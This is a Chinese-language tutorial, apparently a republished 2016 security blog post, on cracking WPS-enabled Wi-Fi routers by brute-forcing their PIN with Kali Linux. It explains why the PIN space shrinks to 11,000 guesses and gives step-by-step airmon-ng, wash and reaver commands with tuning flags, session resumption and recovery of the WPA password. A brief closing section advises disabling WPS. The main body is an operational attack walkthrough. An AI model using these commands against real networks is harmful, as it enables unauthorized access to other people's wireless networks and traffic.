无线安全专题_破解篇02--kali破解pin

前言

最近项目有点紧,所以本应该上周发的文章,拖到了本周三,在此说声抱歉。无线安全专题,我打算系统地写六个部分,分别为破解篇,攻击篇,欺骗篇,路由篇,移动篇和蓝牙篇,当然在发布的过程中,可能还会掺杂着发布flask的教程,分享我的个人博客框架。

上一篇咱们说到了破解篇的第一课:kali破解WPA,今天我们要说的是通过破解pin码,来获取开启wps功能的wifi密码。

  路由器开启wps功能后,会随机生成一个8位的pin码,通过暴力枚举pin码,达到破解的目的,尤其现在很多路由器默认开启了wps功能。大家可能会想到8位的随机pin码将会有100000000种情况,这要pin到何年何月呀。。。。。。不过接下来讲解一下原理,大家会发现其实没多少种情况,这也是这种攻击方式比较流行的原因。

pin码破解的原理

pin码是由8位纯数字组成的识别码,pin码破解是分三部分进行的,规律是这样的:pin码分为三部分,如图:

  前4位为第一部分,第5-7位为第二部分,最后1位为第三部分。第一部分的验证跟第二部分没关联,最后1位是根据第二部分计算得出的校验码。

  破解一开始是先单独对第一部分进行pin码匹配,也就是说先破解前4位pin码。前4位是0000-9999总共10000个组合。

  当前4位pin码确定后再对第二部分进行pin码匹配,也就是再对5-7位进行破解,5-7位是000-999总共1000个组合。

  当前7位都确定后,最后1位也会自动得出,破解完成。

  根据pin码破解的原理,可以看到只需要枚举11000种情况就会必然破解出pin码,从而通过pin得到wifi密码。

pin码爆破

讲解明白原理,接下来开始使用工具爆破pin码,无线专题我们都是基于kali2.0的操作系统,无线网卡采用的是WN722N。

  爆破pin码的前提是路由器开启了WPS功能,首先咱们要做的是发现发现开启WPS功能的wifi。

  将网卡切换到监听模式: airmon-ng start wlan1,如果监听模式切换失败,请看第一篇的内容。

  在命令行中输入:wash -i wlan1,扫描开启wps的wifi设备。WPS Locked为No的都可以爆破试试。

  找到了开启WPS的wifi,接下来咱们就可以进行pin码爆破,下面主要说一下reaver工具。

reaver 命令:

  reaver -i mon0 -b mac -S -v reaver命令参数:

  • -i 监听后接口名称
  • -b 目标mac地址
  • -a 自动检测目标AP最佳配置
  • -S 使用最小的DH key(可以提高PJ速度)
  • -vv 显示更多的非严重警告
  • -d 即delay每穷举一次的闲置时间 预设为1秒
  • -t 即timeout每次穷举等待反馈的最长时间
  • -c 指定频道可以方便找到信号,如-c1 指定1频道

示例:

  reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)   应因状况调整参数(-c后面都已目标频道为1作为例子)   目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1   目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1   目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1

选择之前扫描出来的开启WPS的wifi,选择一个进行破解。

  输入:reaver -i wlan1 -b 54:E6:FC:35:C5:82 -S -N -vv -c 4

在穷举的过程中,reaver会生成以路由mac地址为名的wpc文件,这个文件在kali系统中/etc/reaver/文件夹下。

  一时半会pin不出来,过段时间pin的时候命令加参数 -s file.wpc,就会根据之前的进度继续pin。

注意点

  1.一般reaver 前四位默认是从0开始,如果想从指定的数值开始爆破需要添加-p参数:-p 9000,这个意思就是从9000开始,只要不pin死路由器,可以多开几个窗口,从不同的数值开始。

  2.最后pin完最后会显示WPS PIN(正确的pin码)和WPA PSK(wifi密码),同时如果WPS功能没关,pin码没修改,无论怎样修改密码,都可以通过pin码获取wifi密码: reaver -i mon0 -b mac -p pin码,来再次得到密码

  3.一般pin的过快,会把路由器pin死,所以一般还会加上-d5 -t5参数,添加5秒延时,当然数值可以自己改。

防范措施

  1.WPS功能对个人基本上没啥作用,还是关了吧。

  2.现在的路由一般会有防pin措施,例如会有300秒pin限制,但这个是伪防pin,作用不是很大。它设置时间间隔,正好防止我们把路由器pin死。所以还是把WPS功能关了,不要过分相信防pin措施,毕竟只有11000种情况,早晚会破解。

今天的分享就到这里,下一篇继续分析。如果大家觉得还可以呀,记得分享呦。

原文发布于微信公众号 - 七夜安全博客(qiye_safe)

原文发表时间:2016-08-31

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏大数据挖掘DT机器学习

如何用python轻松破解wifi密码( 源码 )

摘要: 我得说明下这个东西一点都不高端,甚至看起来有点糟糕。而且用的是单线程~,因为过几天要搬家了,于是。。 环境准备 python2.7 凑合的linux 差...

7026
来自专栏gaoqin31

Linux 的账号与群组

理员的工作中,相当重要的一环就是『管理账号』啦!因为整个系统都是你在管理的, 并且所有一般用户的账号申请,都必须要透过你的协助才行!所以你就必须要了解一下如何管...

1081
来自专栏FreeBuf

“白象”APT组织近期动态

“白象”又名“Patchwork”,“摩诃草”,疑似来自南亚某国,自2012年以来持续针对中国、巴基斯坦等国进行网络攻击,长期窃取目标国家的科研、军事资料。与其...

1704
来自专栏FreeBuf

神话传奇:一款通过卖号在微信群传播的远控木马

近期,360安全卫士监测到了一批通过微信群传播的远控木马,木马针对在网上倒卖微信号的人群定向投放。卖号人的交流群里时常有不同的小号在散播诱导性的木马程序,不知情...

1794
来自专栏信安之路

轻松理解什么是 webshell

学安全基础很重要,安全中有很多的特有的关键字,理解这些关键字至关重要,今天给大家分享一下我对于 webshell 的理解。

3430
来自专栏FreeBuf

窃听风云:扒掉你的最后一条“胖次”

“每个人的手机都是一部窃听器,不管你开不开机,都能被窃听。”在2009年上映的《窃听风云》中吴彦祖饰演的人物有这样一句台词,随着影片热映,“手机窃听”的问题被更...

1323
来自专栏中国白客联盟

一次失败的针对白客联盟的渗透测试(域名劫持成功钓鱼失败)

成功的渗透测试套路基本都是那一套。换汤不换药,不成功的原因却是千奇百怪。 我本人感觉,一次不成功的测试如果讲解细致的话反而更能提升技术水平。 这次就来讲一下针对...

5119
来自专栏FreeBuf

文档化身商业木马,对“盗神”的分析与溯源

前言 利用文档进行木马传播的手法,最近一段时间随着敲诈类木马的流行,而被广泛利用了起来。与此同时,这个手法也开始被传统木马所借鉴。近日哈勃分析系统捕捉到一类隐私...

1965
来自专栏小文博客

如何防御分布式拒绝服务DDoS的攻击

2014
来自专栏架构师之路

im协议设计选型(上)

im协议设计选型(上) 周末在一个Qcon群里分享了一些im技术,抽取出其中im协议选型相关的内容,跟大家分享。 分享人:58沈剑,58同城技术委员会主席,高级...

38410

扫码关注云+社区